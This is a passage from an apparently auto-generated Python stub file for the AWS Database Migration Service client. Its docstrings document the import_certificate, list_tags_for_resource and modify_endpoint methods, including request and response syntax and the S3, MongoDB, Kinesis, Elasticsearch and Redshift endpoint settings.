:param waiter_name: The name of the waiter to get. See the waiters
section of the service docs for a list of available waiters.
:returns: The specified waiter object.
:rtype: botocore.waiter.Waiter
"""
pass
def import_certificate(self, CertificateIdentifier: str, CertificatePem: str = None, CertificateWallet: bytes = None, Tags: List = None) -> Dict:
"""
Uploads the specified certificate.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/dms-2016-01-01/ImportCertificate>`_
**Request Syntax**
::
response = client.import_certificate(
CertificateIdentifier='string',
CertificatePem='string',
CertificateWallet=b'bytes',
Tags=[
{
'Key': 'string',
'Value': 'string'
},
]
)
**Response Syntax**
::
{
'Certificate': {
'CertificateIdentifier': 'string',
'CertificateCreationDate': datetime(2015, 1, 1),
'CertificatePem': 'string',
'CertificateWallet': b'bytes',
'CertificateArn': 'string',
'CertificateOwner': 'string',
'ValidFromDate': datetime(2015, 1, 1),
'ValidToDate': datetime(2015, 1, 1),
'SigningAlgorithm': 'string',
'KeyLength': 123
}
}
**Response Structure**
- *(dict) --*
- **Certificate** *(dict) --*
The certificate to be uploaded.
- **CertificateIdentifier** *(string) --*
The customer-assigned name of the certificate. Valid characters are A-z and 0-9.
- **CertificateCreationDate** *(datetime) --*
The date that the certificate was created.
- **CertificatePem** *(string) --*
The contents of the .pem X.509 certificate file for the certificate.
- **CertificateWallet** *(bytes) --*
The location of the imported Oracle Wallet certificate for use with SSL.
- **CertificateArn** *(string) --*
The Amazon Resource Name (ARN) for the certificate.
- **CertificateOwner** *(string) --*
The owner of the certificate.
- **ValidFromDate** *(datetime) --*
The beginning date that the certificate is valid.
- **ValidToDate** *(datetime) --*
The final date that the certificate is valid.
- **SigningAlgorithm** *(string) --*
The signing algorithm for the certificate.
- **KeyLength** *(integer) --*
The key length of the cryptographic algorithm being used.
:type CertificateIdentifier: string
:param CertificateIdentifier: **[REQUIRED]**
The customer-assigned name of the certificate. Valid characters are A-z and 0-9.
:type CertificatePem: string
:param CertificatePem:
The contents of the .pem X.509 certificate file for the certificate.
:type CertificateWallet: bytes
:param CertificateWallet:
The location of the imported Oracle Wallet certificate for use with SSL.
:type Tags: list
:param Tags:
The tags associated with the certificate.
- *(dict) --*
- **Key** *(string) --*
A key is the required name of the tag. The string value can be from 1 to 128 Unicode characters in length and cannot be prefixed with \"aws:\" or \"dms:\". The string can only contain only the set of Unicode letters, digits, white-space, \'_\', \'.\', \'/\', \'=\', \'+\', \'-\' (Java regex: \"^([\\p{L}\\p{Z}\\p{N}_.:/=+\\-]*)$\").
- **Value** *(string) --*
A value is the optional value of the tag. The string value can be from 1 to 256 Unicode characters in length and cannot be prefixed with \"aws:\" or \"dms:\". The string can only contain only the set of Unicode letters, digits, white-space, \'_\', \'.\', \'/\', \'=\', \'+\', \'-\' (Java regex: \"^([\\p{L}\\p{Z}\\p{N}_.:/=+\\-]*)$\").
:rtype: dict
:returns:
"""
pass
def list_tags_for_resource(self, ResourceArn: str) -> Dict:
"""
Lists all tags for an AWS DMS resource.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/dms-2016-01-01/ListTagsForResource>`_
**Request Syntax**
::
response = client.list_tags_for_resource(
ResourceArn='string'
)
**Response Syntax**
::
{
'TagList': [
{
'Key': 'string',
'Value': 'string'
},
]
}
**Response Structure**
- *(dict) --*
- **TagList** *(list) --*
A list of tags for the resource.
- *(dict) --*
- **Key** *(string) --*
A key is the required name of the tag. The string value can be from 1 to 128 Unicode characters in length and cannot be prefixed with "aws:" or "dms:". The string can only contain only the set of Unicode letters, digits, white-space, '_', '.', '/', '=', '+', '-' (Java regex: "^([\\p{L}\\p{Z}\\p{N}_.:/=+\\-]*)$").
- **Value** *(string) --*
A value is the optional value of the tag. The string value can be from 1 to 256 Unicode characters in length and cannot be prefixed with "aws:" or "dms:". The string can only contain only the set of Unicode letters, digits, white-space, '_', '.', '/', '=', '+', '-' (Java regex: "^([\\p{L}\\p{Z}\\p{N}_.:/=+\\-]*)$").
:type ResourceArn: string
:param ResourceArn: **[REQUIRED]**
The Amazon Resource Name (ARN) string that uniquely identifies the AWS DMS resource.
:rtype: dict
:returns:
"""
pass
def modify_endpoint(self, EndpointArn: str, EndpointIdentifier: str = None, EndpointType: str = None, EngineName: str = None, Username: str = None, Password: str = None, ServerName: str = None, Port: int = None, DatabaseName: str = None, ExtraConnectionAttributes: str = None, CertificateArn: str = None, SslMode: str = None, ServiceAccessRoleArn: str = None, ExternalTableDefinition: str = None, DynamoDbSettings: Dict = None, S3Settings: Dict = None, DmsTransferSettings: Dict = None, MongoDbSettings: Dict = None, KinesisSettings: Dict = None, ElasticsearchSettings: Dict = None, RedshiftSettings: Dict = None) -> Dict:
"""
Modifies the specified endpoint.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/dms-2016-01-01/ModifyEndpoint>`_
**Request Syntax**
::
response = client.modify_endpoint(
EndpointArn='string',
EndpointIdentifier='string',
EndpointType='source'|'target',
EngineName='string',
Username='string',
Password='string',
ServerName='string',
Port=123,
DatabaseName='string',
ExtraConnectionAttributes='string',
CertificateArn='string',
SslMode='none'|'require'|'verify-ca'|'verify-full',
ServiceAccessRoleArn='string',
ExternalTableDefinition='string',
DynamoDbSettings={
'ServiceAccessRoleArn': 'string'
},
S3Settings={
'ServiceAccessRoleArn': 'string',
'ExternalTableDefinition': 'string',
'CsvRowDelimiter': 'string',
'CsvDelimiter': 'string',
'BucketFolder': 'string',
'BucketName': 'string',
'CompressionType': 'none'|'gzip',
'EncryptionMode': 'sse-s3'|'sse-kms',
'ServerSideEncryptionKmsKeyId': 'string',
'DataFormat': 'csv'|'parquet',
'EncodingType': 'plain'|'plain-dictionary'|'rle-dictionary',
'DictPageSizeLimit': 123,
'RowGroupLength': 123,
'DataPageSize': 123,
'ParquetVersion': 'parquet-1-0'|'parquet-2-0',
'EnableStatistics': True|False,
'CdcInsertsOnly': True|False
},
DmsTransferSettings={
'ServiceAccessRoleArn': 'string',
'BucketName': 'string'
},
MongoDbSettings={
'Username': 'string',
'Password': 'string',
'ServerName': 'string',
'Port': 123,
'DatabaseName': 'string',
'AuthType': 'no'|'password',
'AuthMechanism': 'default'|'mongodb_cr'|'scram_sha_1',
'NestingLevel': 'none'|'one',
'ExtractDocId': 'string',
'DocsToInvestigate': 'string',
'AuthSource': 'string',
'KmsKeyId': 'string'
},
KinesisSettings={
'StreamArn': 'string',
'MessageFormat': 'json',
'ServiceAccessRoleArn': 'string'
},
ElasticsearchSettings={
'ServiceAccessRoleArn': 'string',
'EndpointUri': 'string',
'FullLoadErrorPercentage': 123,
'ErrorRetryDuration': 123
},
RedshiftSettings={
'AcceptAnyDate': True|False,
'AfterConnectScript': 'string',
'BucketFolder': 'string',
'BucketName': 'string',
'ConnectionTimeout': 123,
'DatabaseName': 'string',
'DateFormat': 'string',
'EmptyAsNull': True|False,
'EncryptionMode': 'sse-s3'|'sse-kms',
'FileTransferUploadStreams': 123,
'LoadTimeout': 123,
'MaxFileSize': 123,
'Password': 'string',
'Port': 123,
'RemoveQuotes': True|False,
'ReplaceInvalidChars': 'string',
'ReplaceChars': 'string',
'ServerName': 'string',
'ServiceAccessRoleArn': 'string',
'ServerSideEncryptionKmsKeyId': 'string',
'TimeFormat': 'string',
'TrimBlanks': True|False,
'TruncateColumns': True|False,
'Username': 'string',
'WriteBufferSize': 123
}
)
**Response Syntax**
::
{
'Endpoint': {
'EndpointIdentifier': 'string',
'EndpointType': 'source'|'target',
'EngineName': 'string',
'EngineDisplayName': 'string',
'Username': 'string',
'ServerName': 'string',
'Port': 123,
'DatabaseName': 'string',
'ExtraConnectionAttributes': 'string',
'Status': 'string',
'KmsKeyId': 'string',
'EndpointArn': 'string',
'CertificateArn': 'string',
'SslMode': 'none'|'require'|'verify-ca'|'verify-full',
'ServiceAccessRoleArn': 'string',
'ExternalTableDefinition': 'string',
'ExternalId': 'string',
'DynamoDbSettings': {
'ServiceAccessRoleArn': 'string'
},
'S3Settings': {
'ServiceAccessRoleArn': 'string',
'ExternalTableDefinition': 'string',
'CsvRowDelimiter': 'string',
'CsvDelimiter': 'string',
'BucketFolder': 'string',
'BucketName': 'string',
'CompressionType': 'none'|'gzip',
'EncryptionMode': 'sse-s3'|'sse-kms',
'ServerSideEncryptionKmsKeyId': 'string',
'DataFormat': 'csv'|'parquet',
'EncodingType': 'plain'|'plain-dictionary'|'rle-dictionary',
'DictPageSizeLimit': 123,
'RowGroupLength': 123,
'DataPageSize': 123,
'ParquetVersion': 'parquet-1-0'|'parquet-2-0',
'EnableStatistics': True|False,
'CdcInsertsOnly': True|False
},
'DmsTransferSettings': {
'ServiceAccessRoleArn': 'string',
'BucketName': 'string'
},
'MongoDbSettings': {
'Username': 'string',
'Password': 'string',
'ServerName': 'string',
'Port': 123,
'DatabaseName': 'string',
'AuthType': 'no'|'password',
'AuthMechanism': 'default'|'mongodb_cr'|'scram_sha_1',
'NestingLevel': 'none'|'one',
'ExtractDocId': 'string',
'DocsToInvestigate': 'string',
'AuthSource': 'string',
'KmsKeyId': 'string'
},
'KinesisSettings': {
'StreamArn': 'string',
'MessageFormat': 'json',
'ServiceAccessRoleArn': 'string'
},
'ElasticsearchSettings': {
'ServiceAccessRoleArn': 'string',
'EndpointUri': 'string',
'FullLoadErrorPercentage': 123,
'ErrorRetryDuration': 123
},
'RedshiftSettings': {
'AcceptAnyDate': True|False,
'AfterConnectScript': 'string',
'BucketFolder': 'string',
'BucketName': 'string',
'ConnectionTimeout': 123,
'DatabaseName': 'string',
'DateFormat': 'string',
'EmptyAsNull': True|False,
'EncryptionMode': 'sse-s3'|'sse-kms',
'FileTransferUploadStreams': 123,
'LoadTimeout': 123,
'MaxFileSize': 123,
'Password': 'string',
'Port': 123,
'RemoveQuotes': True|False,
'ReplaceInvalidChars': 'string',
'ReplaceChars': 'string',
'ServerName': 'string',
'ServiceAccessRoleArn': 'string',
'ServerSideEncryptionKmsKeyId': 'string',
'TimeFormat': 'string',
'TrimBlanks': True|False,
'TruncateColumns': True|False,
'Username': 'string',
'WriteBufferSize': 123
}
}
}
**Response Structure**
- *(dict) --*
- **Endpoint** *(dict) --*
The modified endpoint.
- **EndpointIdentifier** *(string) --*
The database endpoint identifier. Identifiers must begin with a letter; must contain only ASCII letters, digits, and hyphens; and must not end with a hyphen or contain two consecutive hyphens.
- **EndpointType** *(string) --*
The type of endpoint.
- **EngineName** *(string) --*
The database engine name. Valid values, depending on the EndPointType, include mysql, oracle, postgres, mariadb, aurora, aurora-postgresql, redshift, s3, db2, azuredb, sybase, sybase, dynamodb, mongodb, and sqlserver.
- **EngineDisplayName** *(string) --*
The expanded name for the engine name. For example, if the ``EngineName`` parameter is "aurora," this value would be "Amazon Aurora MySQL."
- **Username** *(string) --*
The user name used to connect to the endpoint.
- **ServerName** *(string) --*
The name of the server at the endpoint.
- **Port** *(integer) --*
The port value used to access the endpoint.
- **DatabaseName** *(string) --*
The name of the database at the endpoint.
- **ExtraConnectionAttributes** *(string) --*
Additional connection attributes used to connect to the endpoint.
- **Status** *(string) --*
The status of the endpoint.
- **KmsKeyId** *(string) --*
The AWS KMS key identifier that is used to encrypt the content on the replication instance. If you don't specify a value for the ``KmsKeyId`` parameter, then AWS DMS uses your default encryption key. AWS KMS creates the default encryption key for your AWS account. Your AWS account has a different default encryption key for each AWS Region.
- **EndpointArn** *(string) --*
The Amazon Resource Name (ARN) string that uniquely identifies the endpoint.
- **CertificateArn** *(string) --*
The Amazon Resource Name (ARN) used for SSL connection to the endpoint.
- **SslMode** *(string) --*
The SSL mode used to connect to the endpoint.
SSL mode can be one of four values: none, require, verify-ca, verify-full.
The default value is none.
- **ServiceAccessRoleArn** *(string) --*
The Amazon Resource Name (ARN) used by the service access IAM role.
- **ExternalTableDefinition** *(string) --*
The external table definition.
- **ExternalId** *(string) --*
Value returned by a call to CreateEndpoint that can be used for cross-account validation. Use it on a subsequent call to CreateEndpoint to create the endpoint with a cross-account.
- **DynamoDbSettings** *(dict) --*
The settings for the target DynamoDB database. For more information, see the ``DynamoDBSettings`` structure.
- **ServiceAccessRoleArn** *(string) --*
The Amazon Resource Name (ARN) used by the service access IAM role.
- **S3Settings** *(dict) --*
The settings for the S3 target endpoint. For more information, see the ``S3Settings`` structure.
- **ServiceAccessRoleArn** *(string) --*
The Amazon Resource Name (ARN) used by the service access IAM role.
- **ExternalTableDefinition** *(string) --*
The external table definition.
- **CsvRowDelimiter** *(string) --*
The delimiter used to separate rows in the source files. The default is a carriage return (``\n`` ).
- **CsvDelimiter** *(string) --*
The delimiter used to separate columns in the source files. The default is a comma.
- **BucketFolder** *(string) --*
An optional parameter to set a folder name in the S3 bucket. If provided, tables are created in the path ``<bucketFolder>/<schema_name>/<table_name>/`` . If this parameter is not specified, then the path used is ``<schema_name>/<table_name>/`` .
- **BucketName** *(string) --*
The name of the S3 bucket.
- **CompressionType** *(string) --*
An optional parameter to use GZIP to compress the target files. Set to GZIP to compress the target files. Set to NONE (the default) or do not use to leave the files uncompressed. Applies to both CSV and PARQUET data formats.
- **EncryptionMode** *(string) --*
The type of server side encryption you want to use for your data. This is part of the endpoint settings or the extra connections attributes for Amazon S3. You can choose either ``SSE_S3`` (default) or ``SSE_KMS`` . To use ``SSE_S3`` , you need an IAM role with permission to allow ``"arn:aws:s3:::dms-*"`` to use the following actions:
* s3:CreateBucket
* s3:ListBucket
* s3:DeleteBucket
* s3:GetBucketLocation
* s3:GetObject
* s3:PutObject
* s3:DeleteObject
* s3:GetObjectVersion
* s3:GetBucketPolicy
* s3:PutBucketPolicy
* s3:DeleteBucketPolicy
- **ServerSideEncryptionKmsKeyId** *(string) --*
If you are using SSE_KMS for the ``EncryptionMode`` , provide the KMS Key ID. The key you use needs an attached policy that enables IAM user permissions and allows use of the key.
Here is a CLI example: ``aws dms create-endpoint --endpoint-identifier <value> --endpoint-type target --engine-name s3 --s3-settings ServiceAccessRoleArn=<value>,BucketFolder=<value>,BucketName=<value>,EncryptionMode=SSE_KMS,ServerSideEncryptionKmsKeyId=<value>``
- **DataFormat** *(string) --*
The format of the data which you want to use for output. You can choose one of the following:
* ``CSV`` : This is a row-based format with comma-separated values.
* ``PARQUET`` : Apache Parquet is a columnar storage format that features efficient compression and provides faster query response.
- **EncodingType** *(string) --*
The type of encoding you are using: ``RLE_DICTIONARY`` (default), ``PLAIN`` , or ``PLAIN_DICTIONARY`` .
* ``RLE_DICTIONARY`` uses a combination of bit-packing and run-length encoding to store repeated values more efficiently.
* ``PLAIN`` does not use encoding at all. Values are stored as they are.
* ``PLAIN_DICTIONARY`` builds a dictionary of the values encountered in a given column. The dictionary is stored in a dictionary page for each column chunk.
- **DictPageSizeLimit** *(integer) --*
The maximum size of an encoded dictionary page of a column. If the dictionary page exceeds this, this column is stored using an encoding type of ``PLAIN`` . Defaults to 1024 * 1024 bytes (1MiB), the maximum size of a dictionary page before it reverts to ``PLAIN`` encoding. For ``PARQUET`` format only.
- **RowGroupLength** *(integer) --*
The number of rows in a row group. A smaller row group size provides faster reads. But as the number of row groups grows, the slower writes become. Defaults to 10,000 (ten thousand) rows. For ``PARQUET`` format only.
If you choose a value larger than the maximum, ``RowGroupLength`` is set to the max row group length in bytes (64 * 1024 * 1024).
- **DataPageSize** *(integer) --*
The size of one data page in bytes. Defaults to 1024 * 1024 bytes (1MiB). For ``PARQUET`` format only.
- **ParquetVersion** *(string) --*
The version of Apache Parquet format you want to use: ``PARQUET_1_0`` (default) or ``PARQUET_2_0`` .
- **EnableStatistics** *(boolean) --*
Enables statistics for Parquet pages and rowGroups. Choose ``TRUE`` to enable statistics, choose ``FALSE`` to disable. Statistics include ``NULL`` , ``DISTINCT`` , ``MAX`` , and ``MIN`` values. Defaults to ``TRUE`` . For ``PARQUET`` format only.
- **CdcInsertsOnly** *(boolean) --*
Option to write only ``INSERT`` operations to the comma-separated value (CSV) output files. By default, the first field in a CSV record contains the letter ``I`` (insert), ``U`` (update) or ``D`` (delete) to indicate whether the row was inserted, updated, or deleted at the source database. If ``cdcInsertsOnly`` is set to true, then only ``INSERT`` s are recorded in the CSV file, without the ``I`` annotation on each line. Valid values are ``TRUE`` and ``FALSE`` .
- **DmsTransferSettings** *(dict) --*
The settings in JSON format for the DMS transfer type of source endpoint.
Possible attributes include the following:
* ``serviceAccessRoleArn`` - The IAM role that has permission to access the Amazon S3 bucket.
* ``bucketName`` - The name of the S3 bucket to use.
* ``compressionType`` - An optional parameter to use GZIP to compress the target files. To use GZIP, set this value to ``NONE`` (the default). To keep the files uncompressed, don't use this value.
Shorthand syntax for these attributes is as follows: ``ServiceAccessRoleArn=string,BucketName=string,CompressionType=string``
JSON syntax for these attributes is as follows: ``{ "ServiceAccessRoleArn": "string", "BucketName": "string", "CompressionType": "none"|"gzip" }``
- **ServiceAccessRoleArn** *(string) --*
The IAM role that has permission to access the Amazon S3 bucket.
- **BucketName** *(string) --*
The name of the S3 bucket to use.
- **MongoDbSettings** *(dict) --*
The settings for the MongoDB source endpoint. For more information, see the ``MongoDbSettings`` structure.
- **Username** *(string) --*
The user name you use to access the MongoDB source endpoint.
- **Password** *(string) --*
The password for the user account you use to access the MongoDB source endpoint.
- **ServerName** *(string) --*
The name of the server on the MongoDB source endpoint.
- **Port** *(integer) --*
The port value for the MongoDB source endpoint.
- **DatabaseName** *(string) --*
The database name on the MongoDB source endpoint.
- **AuthType** *(string) --*
The authentication type you use to access the MongoDB source endpoint.
Valid values: NO, PASSWORD
When NO is selected, user name and password parameters are not used and can be empty.
- **AuthMechanism** *(string) --*
The authentication mechanism you use to access the MongoDB source endpoint.
Valid values: DEFAULT, MONGODB_CR, SCRAM_SHA_1
DEFAULT – For MongoDB version 2.x, use MONGODB_CR. For MongoDB version 3.x, use SCRAM_SHA_1. This attribute is not used when authType=No.
- **NestingLevel** *(string) --*
Specifies either document or table mode.
Valid values: NONE, ONE
Default value is NONE. Specify NONE to use document mode. Specify ONE to use table mode.
- **ExtractDocId** *(string) --*
Specifies the document ID. Use this attribute when ``NestingLevel`` is set to NONE.
Default value is false.
- **DocsToInvestigate** *(string) --*
Indicates the number of documents to preview to determine the document organization. Use this attribute when ``NestingLevel`` is set to ONE.
Must be a positive value greater than 0. Default value is 1000.
- **AuthSource** *(string) --*
The MongoDB database name. This attribute is not used when ``authType=NO`` .
The default is admin.
- **KmsKeyId** *(string) --*
The AWS KMS key identifier that is used to encrypt the content on the replication instance. If you don't specify a value for the ``KmsKeyId`` parameter, then AWS DMS uses your default encryption key. AWS KMS creates the default encryption key for your AWS account. Your AWS account has a different default encryption key for each AWS Region.
- **KinesisSettings** *(dict) --*
The settings for the Amazon Kinesis source endpoint. For more information, see the ``KinesisSettings`` structure.
- **StreamArn** *(string) --*
The Amazon Resource Name (ARN) for the Amazon Kinesis Data Streams endpoint.
- **MessageFormat** *(string) --*
The output format for the records created on the endpoint. The message format is ``JSON`` .
- **ServiceAccessRoleArn** *(string) --*
The Amazon Resource Name (ARN) for the IAM role that DMS uses to write to the Amazon Kinesis data stream.
- **ElasticsearchSettings** *(dict) --*
The settings for the Elasticsearch source endpoint. For more information, see the ``ElasticsearchSettings`` structure.
- **ServiceAccessRoleArn** *(string) --*
The Amazon Resource Name (ARN) used by service to access the IAM role.
- **EndpointUri** *(string) --*
The endpoint for the ElasticSearch cluster.
- **FullLoadErrorPercentage** *(integer) --*
The maximum percentage of records that can fail to be written before a full load operation stops.
- **ErrorRetryDuration** *(integer) --*
The maximum number of seconds that DMS retries failed API requests to the Elasticsearch cluster.
- **RedshiftSettings** *(dict) --*
Settings for the Amazon Redshift endpoint
- **AcceptAnyDate** *(boolean) --*
Allows any date format, including invalid formats such as 00/00/00 00:00:00, to be loaded without generating an error. You can choose TRUE or FALSE (default).
This parameter applies only to TIMESTAMP and DATE columns. Always use ACCEPTANYDATE with the DATEFORMAT parameter. If the date format for the data does not match the DATEFORMAT specification, Amazon Redshift inserts a NULL value into that field.
- **AfterConnectScript** *(string) --*
Code to run after connecting. This should be the code, not a filename.
- **BucketFolder** *(string) --*
The location where the CSV files are stored before being uploaded to the S3 bucket.
- **BucketName** *(string) --*
The name of the S3 bucket you want to use
- **ConnectionTimeout** *(integer) --*
Sets the amount of time to wait (in milliseconds) before timing out, beginning from when you initially establish a connection.
- **DatabaseName** *(string) --*
The name of the Amazon Redshift data warehouse (service) you are working with.
- **DateFormat** *(string) --*
The date format you are using. Valid values are ``auto`` (case-sensitive), your date format string enclosed in quotes, or NULL. If this is left unset (NULL), it defaults to a format of 'YYYY-MM-DD'. Using ``auto`` recognizes most strings, even some that are not supported when you use a date format string.
If your date and time values use formats different from each other, set this to ``auto`` .
- **EmptyAsNull** *(boolean) --*
Specifies whether AWS DMS should migrate empty CHAR and VARCHAR fields as NULL. A value of TRUE sets empty CHAR and VARCHAR fields to null. The default is FALSE.
- **EncryptionMode** *(string) --*
The type of server side encryption you want to use for your data. This is part of the endpoint settings or the extra connections attributes for Amazon S3. You can choose either SSE_S3 (default) or SSE_KMS. To use SSE_S3, create an IAM role with a policy that allows ``"arn:aws:s3:::*"`` to use the following actions: ``"s3:PutObject", "s3:ListBucket"`` .
- **FileTransferUploadStreams** *(integer) --*
Specifies the number of threads used to upload a single file. This accepts a value between 1 and 64. It defaults to 10.
- **LoadTimeout** *(integer) --*
Sets the amount of time to wait (in milliseconds) before timing out, beginning from when you begin loading.
- **MaxFileSize** *(integer) --*
Specifies the maximum size (in KB) of any CSV file used to transfer data to Amazon Redshift. This accepts a value between 1 and 1048576. It defaults to 32768 KB (32 MB).
- **Password** *(string) --*
The password for the user named in the username property.
- **Port** *(integer) --*
The port number for Amazon Redshift. The default value is 5439.
- **RemoveQuotes** *(boolean) --*
Removes surrounding quotation marks from strings in the incoming data. All characters within the quotation marks, including delimiters, are retained. Choose TRUE to remove quotation marks. The default is FALSE.
- **ReplaceInvalidChars** *(string) --*
A list of chars you want to replace. Use with ``ReplaceChars`` .
- **ReplaceChars** *(string) --*
Replaces invalid characters specified in ``ReplaceInvalidChars`` , substituting the specified value instead. The default is "?".
- **ServerName** *(string) --*
The name of the Amazon Redshift cluster you are using.
- **ServiceAccessRoleArn** *(string) --*
The ARN of the role that has access to the Redshift service.
- **ServerSideEncryptionKmsKeyId** *(string) --*
If you are using SSE_KMS for the ``EncryptionMode`` , provide the KMS Key ID. The key you use needs an attached policy that enables IAM user permissions and allows use of the key.
- **TimeFormat** *(string) --*
The time format you want to use. Valid values are ``auto`` (case-sensitive), 'timeformat_string', 'epochsecs', or 'epochmillisecs'. It defaults to 10. Using ``auto`` recognizes most strings, even some that are not supported when you use a time format string.
If your date and time values use formats different from each other, set this to ``auto`` .
- **TrimBlanks** *(boolean) --*
Removes the trailing white space characters from a VARCHAR string. This parameter applies only to columns with a VARCHAR data type. Choose TRUE to remove unneeded white space. The default is FALSE.
- **TruncateColumns** *(boolean) --*
Truncates data in columns to the appropriate number of characters, so that it fits in the column. Applies only to columns with a VARCHAR or CHAR data type, and rows with a size of 4 MB or less. Choose TRUE to truncate data. The default is FALSE.
- **Username** *(string) --*
An Amazon Redshift user name for a registered user.
- **WriteBufferSize** *(integer) --*
The size of the write buffer to use in rows. Valid values range from 1 to 2048. Defaults to 1024. Use this setting to tune performance.
:type EndpointArn: string
:param EndpointArn: **[REQUIRED]**
The Amazon Resource Name (ARN) string that uniquely identifies the endpoint.
:type EndpointIdentifier: string
:param EndpointIdentifier:
The database endpoint identifier. Identifiers must begin with a letter; must contain only ASCII letters, digits, and hyphens; and must not end with a hyphen or contain two consecutive hyphens.
:type EndpointType: string
:param EndpointType:
The type of endpoint.
:type EngineName: string
:param EngineName:
The type of engine for the endpoint. Valid values, depending on the EndPointType, include mysql, oracle, postgres, mariadb, aurora, aurora-postgresql, redshift, s3, db2, azuredb, sybase, sybase, dynamodb, mongodb, and sqlserver.
:type Username: string
:param Username:
The user name to be used to login to the endpoint database.
:type Password: string
:param Password:
The password to be used to login to the endpoint database.
:type ServerName: string
:param ServerName:
The name of the server where the endpoint database resides.
:type Port: integer
:param Port:
The port used by the endpoint database.
:type DatabaseName: string
:param DatabaseName:
The name of the endpoint database.
:type ExtraConnectionAttributes: string
:param ExtraConnectionAttributes:
Additional attributes associated with the connection. To reset this parameter, pass the empty string (\"\") as an argument.
:type CertificateArn: string
:param CertificateArn:
The Amazon Resource Name (ARN) of the certificate used for SSL connection.
:type SslMode: string
:param SslMode:
The SSL mode to be used.
SSL mode can be one of four values: none, require, verify-ca, verify-full.
The default value is none.
:type ServiceAccessRoleArn: string
:param ServiceAccessRoleArn:
The Amazon Resource Name (ARN) for the service access role you want to use to modify the endpoint.
:type ExternalTableDefinition: string
:param ExternalTableDefinition:
The external table definition.
:type DynamoDbSettings: dict
:param DynamoDbSettings:
Settings in JSON format for the target Amazon DynamoDB endpoint. For more information about the available settings, see `Using Object Mapping to Migrate Data to DynamoDB <https://docs.aws.amazon.com/dms/latest/userguide/CHAP_Target.DynamoDB.html>`__ in the *AWS Database Migration Service User Guide.*
- **ServiceAccessRoleArn** *(string) --* **[REQUIRED]**
The Amazon Resource Name (ARN) used by the service access IAM role.
:type S3Settings: dict
:param S3Settings:
Settings in JSON format for the target Amazon S3 endpoint. For more information about the available settings, see `Extra Connection Attributes When Using Amazon S3 as a Target for AWS DMS <https://docs.aws.amazon.com/dms/latest/userguide/CHAP_Target.S3.html#CHAP_Target.S3.Configuring>`__ in the *AWS Database Migration Service User Guide.*
- **ServiceAccessRoleArn** *(string) --*
The Amazon Resource Name (ARN) used by the service access IAM role.
- **ExternalTableDefinition** *(string) --*
The external table definition.
- **CsvRowDelimiter** *(string) --*
The delimiter used to separate rows in the source files. The default is a carriage return (``\n`` ).
- **CsvDelimiter** *(string) --*
The delimiter used to separate columns in the source files. The default is a comma.
- **BucketFolder** *(string) --*
An optional parameter to set a folder name in the S3 bucket. If provided, tables are created in the path ``<bucketFolder>/<schema_name>/<table_name>/`` . If this parameter is not specified, then the path used is ``<schema_name>/<table_name>/`` .
- **BucketName** *(string) --*
The name of the S3 bucket.
- **CompressionType** *(string) --*
An optional parameter to use GZIP to compress the target files. Set to GZIP to compress the target files. Set to NONE (the default) or do not use to leave the files uncompressed. Applies to both CSV and PARQUET data formats.
- **EncryptionMode** *(string) --*
The type of server side encryption you want to use for your data. This is part of the endpoint settings or the extra connections attributes for Amazon S3. You can choose either ``SSE_S3`` (default) or ``SSE_KMS`` . To use ``SSE_S3`` , you need an IAM role with permission to allow ``\"arn:aws:s3:::dms-*\"`` to use the following actions:
* s3:CreateBucket
* s3:ListBucket
* s3:DeleteBucket
* s3:GetBucketLocation
* s3:GetObject
* s3:PutObject
* s3:DeleteObject
* s3:GetObjectVersion
* s3:GetBucketPolicy
* s3:PutBucketPolicy
* s3:DeleteBucketPolicy
- **ServerSideEncryptionKmsKeyId** *(string) --*
If you are using SSE_KMS for the ``EncryptionMode`` , provide the KMS Key ID. The key you use needs an attached policy that enables IAM user permissions and allows use of the key.
Here is a CLI example: ``aws dms create-endpoint --endpoint-identifier <value> --endpoint-type target --engine-name s3 --s3-settings ServiceAccessRoleArn=<value>,BucketFolder=<value>,BucketName=<value>,EncryptionMode=SSE_KMS,ServerSideEncryptionKmsKeyId=<value>``
- **DataFormat** *(string) --*
The format of the data which you want to use for output. You can choose one of the following:
* ``CSV`` : This is a row-based format with comma-separated values.
* ``PARQUET`` : Apache Parquet is a columnar storage format that features efficient compression and provides faster query response.
- **EncodingType** *(string) --*
The type of encoding you are using: ``RLE_DICTIONARY`` (default), ``PLAIN`` , or ``PLAIN_DICTIONARY`` .
* ``RLE_DICTIONARY`` uses a combination of bit-packing and run-length encoding to store repeated values more efficiently.
* ``PLAIN`` does not use encoding at all. Values are stored as they are.
* ``PLAIN_DICTIONARY`` builds a dictionary of the values encountered in a given column. The dictionary is stored in a dictionary page for each column chunk.
- **DictPageSizeLimit** *(integer) --*
The maximum size of an encoded dictionary page of a column. If the dictionary page exceeds this, this column is stored using an encoding type of ``PLAIN`` . Defaults to 1024 * 1024 bytes (1MiB), the maximum size of a dictionary page before it reverts to ``PLAIN`` encoding. For ``PARQUET`` format only.
- **RowGroupLength** *(integer) --*
The number of rows in a row group. A smaller row group size provides faster reads. But as the number of row groups grows, the slower writes become. Defaults to 10,000 (ten thousand) rows. For ``PARQUET`` format only.
If you choose a value larger than the maximum, ``RowGroupLength`` is set to the max row group length in bytes (64 * 1024 * 1024).
- **DataPageSize** *(integer) --*
The size of one data page in bytes. Defaults to 1024 * 1024 bytes (1MiB). For ``PARQUET`` format only.
- **ParquetVersion** *(string) --*
The version of Apache Parquet format you want to use: ``PARQUET_1_0`` (default) or ``PARQUET_2_0`` .
- **EnableStatistics** *(boolean) --*
Enables statistics for Parquet pages and rowGroups. Choose ``TRUE`` to enable statistics, choose ``FALSE`` to disable. Statistics include ``NULL`` , ``DISTINCT`` , ``MAX`` , and ``MIN`` values. Defaults to ``TRUE`` . For ``PARQUET`` format only.
- **CdcInsertsOnly** *(boolean) --*
Option to write only ``INSERT`` operations to the comma-separated value (CSV) output files. By default, the first field in a CSV record contains the letter ``I`` (insert), ``U`` (update) or ``D`` (delete) to indicate whether the row was inserted, updated, or deleted at the source database. If ``cdcInsertsOnly`` is set to true, then only ``INSERT`` s are recorded in the CSV file, without the ``I`` annotation on each line. Valid values are ``TRUE`` and ``FALSE`` .
:type DmsTransferSettings: dict
:param DmsTransferSettings:
The settings in JSON format for the DMS transfer type of source endpoint.
Attributes include the following:
* serviceAccessRoleArn - The IAM role that has permission to access the Amazon S3 bucket.
* BucketName - The name of the S3 bucket to use.
* compressionType - An optional parameter to use GZIP to compress the target files. Set to NONE (the default) or do not use to leave the files uncompressed.
